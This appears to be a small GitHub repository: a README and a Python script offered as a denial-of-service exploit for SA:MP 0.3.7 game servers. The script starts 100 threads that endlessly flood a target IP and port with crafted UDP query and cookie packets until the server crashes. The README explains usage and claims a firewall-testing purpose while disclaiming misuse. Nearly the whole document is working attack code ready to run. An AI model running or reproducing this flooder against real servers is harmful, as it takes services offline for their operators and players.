├── README.md └── samp-exploit.py /README.md: -------------------------------------------------------------------------------- 1 | # SA-MP-DOS-Exploit 2 | 3 | Simple python script, exploiting vulnerabilities of version 0.3.7 of SA:MP servers, 4 | the script consists of a flood of requests for cookies and connections, the server ends up crashing and crashing, will not look online to players. 5 | This bug is still functional in version 0.3.7. This script was developed to test firewalls that aim to stop this exploit, I am not responsible for the misuse of this script! 6 | Most of the servers are already protected against this type of attack so I didn't see a problem in making it available! 7 | Usage: python samp-exploit.py 8 | 9 | example usage: python samp-exploit.py 192.168.31.1 7777 10 | -------------------------------------------------------------------------------- /samp-exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import codecs,sys 4 | import threading 5 | import random 6 | import time 7 | import os 8 | 9 | 10 | 11 | 12 | ip = sys.argv[1] 13 | port = sys.argv[2] 14 | orgip =ip 15 | 16 | Pacotes = [codecs.decode("53414d5090d91d4d611e700a465b00","hex_codec"),#p 17 | codecs.decode("53414d509538e1a9611e63","hex_codec"),#c 18 | codecs.decode("53414d509538e1a9611e69","hex_codec"),#i 19 | codecs.decode("53414d509538e1a9611e72","hex_codec"),#r 20 | codecs.decode("081e62da","hex_codec"), #cookie port 7796 21 | codecs.decode("081e77da","hex_codec"),#cookie port 7777 22 | codecs.decode("081e4dda","hex_codec"),#cookie port 7771 23 | codecs.decode("021efd40","hex_codec"),#cookie port 7784 24 | codecs.decode("021efd40","hex_codec"),#cookie port 1111 25 | codecs.decode("081e7eda","hex_codec")#cookie port 1111 tambem 26 | ] 27 | 28 | 29 | print("Ataque iniciado no ip: %s e Porta: %s"%(orgip,port)) 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | class MyThread(threading.Thread): 38 | def run(self): 39 | while True: 40 | sock = socket.socket( 41 | socket.AF_INET, socket.SOCK_DGRAM) # Internet and UDP 42 | 43 | msg = Pacotes[random.randrange(0,3)] 44 | 45 | sock.sendto(msg, (ip, int(port))) 46 | 47 | 48 | if(int(port) == 7777): 49 | sock.sendto(Pacotes[5], (ip, int(port))) 50 | elif(int(port) == 7796): 51 | sock.sendto(Pacotes[4], (ip, int(port))) 52 | elif(int(port) == 7771): 53 | sock.sendto(Pacotes[6], (ip, int(port))) 54 | elif(int(port) == 7784): 55 | sock.sendto(Pacotes[7], (ip, int(port))) 56 | elif(int(port) == 1111): 57 | sock.sendto(Pacotes[9], (ip, int(port))) 58 | 59 | 60 | if __name__ == '__main__': 61 | try: 62 | for x in range(100): 63 | mythread = MyThread() 64 | mythread.start() 65 | time.sleep(.1) 66 | except(KeyboardInterrupt): 67 | os.system('cls' if os.name == 'nt' else 'clear') 68 | 69 | print('#########################################################################') 70 | print('SA:MP Exploit') 71 | print('#########################################################################') 72 | print('\n\n') 73 | print('Ataque para ip {} foi parado'.format(orgip)) 74 | pass 75 | --------------------------------------------------------------------------------